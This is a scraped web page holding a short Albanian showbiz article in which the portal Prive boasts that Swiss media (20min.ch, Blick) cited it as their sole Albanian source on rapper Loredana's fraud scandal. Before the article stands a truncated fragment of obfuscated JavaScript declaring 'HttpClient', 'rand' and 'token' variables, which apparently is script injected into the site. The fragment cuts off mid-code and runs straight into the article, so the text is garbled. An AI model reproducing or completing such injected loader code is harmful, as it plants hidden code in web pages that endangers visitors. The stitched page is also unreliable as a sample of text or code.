;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Prive, i vetmi burim shqiptar i referencës për kolegët zviceran

By

Kryelajmi i tre ditëve të fundit është pa dyshim skandali që përfshin reperen Loredana.

Në një rast të paprecedentë, për të parën herë, një artiste shqiptare mori vëmendjen e madhe të mediave të huaja, në këtë rast, atyre zvicerane.

Ishin mediumet prestigjioze atje ‘20min.ch’ e ‘Blick’ ato që mbuluan hap pas hapi çdo detaj në lidhje me skemën e përfitimit të gati 1 milion frangëve duke bërë që shumica e lajmeve që qarkulluan në portalet shqiptare, vetëm të përkthehen pasi ishin të gatshme nga kolegët zviceranë.

Mirëpo, Prive, adresa kryesore e shoubizit shqiptar ka qenë i vetmi medium shqiptar, pikë reference për prestigjiozet ‘20min.ch’ e ‘Blick’.

Portalet në fjalë janë shërbyer me pamjet e Prive pas ardhjes në Prishtinë të çiftit, ku në aeroport ata u kapën nga kamerat e Klan Kosovës. Tutje, edhe shkrimet në lidhje me arsyet e ardhjes së Loredanës në Kosovë kanë cituar Prive si burimin e lajmit.

Ky zhvillim rikonfirmon pozitën e pakontestueshme të Prive si adresa numër një e shoubizit shqiptar falë punës së palodhshme të stafit, konsistencës, raportimeve ekskluzive dhe mbi të gjitha, lexuesve të shumtë besnikë. Ju duam!

Artikuj të ngjashëm